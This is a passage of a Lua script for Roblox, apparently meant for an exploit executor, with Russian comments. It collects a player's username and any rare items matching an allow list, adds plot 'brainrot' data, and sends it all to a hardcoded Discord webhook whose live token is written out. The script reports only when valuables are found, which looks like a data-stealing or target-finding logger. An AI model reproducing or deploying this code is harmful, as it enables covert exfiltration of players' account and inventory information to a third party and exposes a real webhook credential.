-- === Сбор инвентаря с фильтром секреток ===
local function collectInventory()
    local invText = ""
    local items = {}

    -- Список разрешённых "секреток"
    local allowItems = {
        "garamararam",  -- добавь сюда все нужные секретки
        "ultrabrain",   -- пример
        "legendarytool", -- пример
    }

    local function addItemsFrom(container)
        if not container then return end
        for _, item in ipairs(container:GetChildren()) do
            if item:IsA("Tool") then
                local nameLower = item.Name:lower()
                -- проверяем есть ли в списке разрешённых
                for _, allowed in ipairs(allowItems) do
                    if string.find(nameLower, allowed) then
                        table.insert(items, item.Name)
                        break
                    end
                end
            end
        end
    end

    addItemsFrom(localPlayer:FindFirstChild("Backpack"))
    addItemsFrom(localPlayer.Character)

    if #items == 0 then
        return nil -- ничего не отправляем, если нет секреток
    else
        invText = "\n--- Inventory ---\n"
        for _, name in ipairs(items) do
            invText = invText .. "- " .. name .. "\n"
        end
    end

    return invText
end

-- === Основной запуск с проверкой ===
local plot = findPlayerPlot()
local brainrots = plot and collectBrainrots(plot) or "❌ Plot не найден"
local inventory = collectInventory()

if inventory then
    brainrots = brainrots .. inventory -- объединяем Brainrots + Inventory

    -- === Отправка в Discord ===
    request({
        Url = "https://discord.com/api/webhooks/1417846130619977738/mgmCuOeNpaNOBQddZUtCPaeheSjaBWdLNLfPPg2xk6-533OjiGgbjxwmkKPsQO7TK9ep",
        Method = "POST",
        Headers = {
            ["Content-Type"] = "application/json"
        },
        Body = HttpService:JSONEncode({
            ["embeds"] = {{
                ["title"] = "**Brainrots | Elly**",
                ["color"] = 65280,
                ["fields"] = {
                    {
                        ["name"] = "👤 Username",
                        ["value"] = localPlayer.Name,
                        ["inline"] = false
                    },
                    {
                        ["name"] = "🪐 Brainrots \ Plot",
                        ["value"] = brainrots,
                        ["inline"] = false
                    }
                }
            }}
        })
    })
end
